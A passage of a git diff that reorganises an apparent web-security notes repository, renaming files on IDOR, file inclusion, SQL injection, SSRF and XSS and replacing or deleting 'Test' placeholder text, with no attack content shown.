b/docs/Services/Services.md @@ -1 +1 @@ -Test \ No newline at end of file +List of services and general commands \ No newline at end of file diff --git a/docs/Web/IDOR/IDOR.md b/docs/Web/IDOR.md similarity index 100% rename from docs/Web/IDOR/IDOR.md rename to docs/Web/IDOR.md diff --git a/docs/Web/RFI-LFI File Inclusion/RFI-LFI File Inclusion.md b/docs/Web/RFI-LFI File Inclusion.md similarity index 100% rename from docs/Web/RFI-LFI File Inclusion/RFI-LFI File Inclusion.md rename to docs/Web/RFI-LFI File Inclusion.md diff --git a/docs/Web/Command Injection/SQL Injection.md b/docs/Web/SQL Injection.md similarity index 100% rename from docs/Web/Command Injection/SQL Injection.md rename to docs/Web/SQL Injection.md diff --git a/docs/Web/SQL Injection/SQL Injection.md b/docs/Web/SQL Injection/SQL Injection.md deleted file mode 100644 index 8318c86b3..000000000 --- a/docs/Web/SQL Injection/SQL Injection.md +++ /dev/null @@ -1 +0,0 @@ -Test \ No newline at end of file diff --git a/docs/Web/SSRF/SSRF.md b/docs/Web/SSRF.md similarity index 100% rename from docs/Web/SSRF/SSRF.md rename to docs/Web/SSRF.md diff --git a/docs/Web/XSS (Cross-Site Scripting)/XSS (Cross-Site Scripting).md b/docs/Web/XSS (Cross-Site Scripting).md similarity index 100% rename from docs/Web/XSS (Cross-Site Scripting)/XSS (Cross-Site Scripting).md rename to docs/Web/XSS (Cross-Site Scripting).md